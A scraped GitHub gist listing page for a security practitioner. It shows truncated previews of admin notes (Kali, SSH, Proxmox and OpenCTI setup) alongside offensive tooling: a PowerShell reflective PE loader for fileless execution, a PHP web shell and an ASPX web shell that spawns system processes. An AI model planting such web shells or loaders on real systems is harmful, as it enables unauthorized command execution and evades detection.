Skip to content

Instantly share code, notes, and snippets.

View timsonner's full-sized avatar

Tim Sonner timsonner

18 followers · 11 following
View GitHub Profile
@timsonner
timsonner / kali-setup.md
Last active June 6, 2025 07:34
Remove firefox, libreoffice, and kali-desktop-xfce. Install Edge, VS Code, Git, Xfce, and Synaptics DisplayLink driver.

Kali setup

# Get rid of Kali xfce
apt remove kali-desktop-xfce --allow-remove-essential
apt purge kali-desktop-xfce --autoremove
# Install xfce
apt install xfce4 lightdm
# Get rid of firefox
apt remove firefox-esr --allow-remove-essential
@timsonner
timsonner / ssh-setup.md
Created May 18, 2025 18:22
Linux SSH server setup and key pair generation

Linux SSH server setup and key pair generation

SSH server setup

# Install SSH server
apt install openssh-server
# Enable SSH server on startup
systemctl enable ssh
# Check SSH server status
systemctl status ssh
@timsonner
timsonner / opencti-docker-setup.md
Created May 18, 2025 17:44
OpenCTI docker setup for MacOS

OpenCTI docker setup for MacOS

Clone OpenCTI repo

git clone https://github.com/OpenCTI-Platform/docker.git
cd docker

Create .env file for OpenCTI setup for MacOS (use official docs for windows/linux)

create-env.sh

@timsonner
timsonner / proxmox-setup.md
Last active April 27, 2025 20:37
ProxMox developer workstation config notes

ProxMox Developer Workstation setup

  • Install ProxMox as usual
  • Edit /etc/network/interfaces to reflect the correct IP and interface of ethernet adapter
  • Edit /etc/resolv.conf to reflect DNS server, likely gateway of router or switch

Once internet connection established, install gnome

apt install gnome
@timsonner
timsonner / triage-security-events.md
Created April 13, 2025 12:34
Powershell. Lookup Windows security events quickly to corelate activity.
@timsonner
timsonner / reflective-pe-load.ps1
Created March 12, 2025 02:29
Load an executable into memory without touching disk using PowerShell to reflectively load a c# type
# Reflectively load a PE file
$code = @"
using System;
using System.Runtime.InteropServices;
using System.IO;
public class PELoader
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr GetCurrentProcess();
@timsonner
timsonner / user-account-control-proeprties.md
Created February 22, 2025 05:59
UserAccountControl properties. Property, Hex, Decimal, Description.
Property Flag Value in Hexadecimal Value in Decimal Brief Description
SCRIPT 0x0001 1 The logon script will be run.
ACCOUNTDISABLE 0x0002 2 The user account is disabled.
HOMEDIR_REQUIRED 0x0008 8 The home folder is required.
LOCKOUT 0x0010 16
@timsonner
timsonner / php-shell-linux.md
Last active February 7, 2025 06:27
PHP, Javascript, HTML Non-Interactive web shell

PHP, Javascript, HTML non-interactive web shell

php-linux-shell.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Non-Interactive Shell</title>
    <script>
@timsonner
timsonner / powershell-http-fileserver.md
Last active February 1, 2025 23:00
Fileserver in PowerShell. Rough equivalent of python3 -m http.server...

PowerShell HTTP fileserver

Kick hole in firewall

New-NetFirewallRule -DisplayName "Open Port 8081" -Direction Inbound -Protocol TCP -LocalPort 8081 -Action Allow

PowerShell Http Server

# Define the directory to serve
@timsonner
timsonner / shell.aspx
Last active January 29, 2025 08:46
IIS PowerSnail Shell with pretty output. Spawn system processes from web browser...
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>PowerSnail Shell</title>
<style>
.output {
font-family: Consolas, "Courier New", monospace;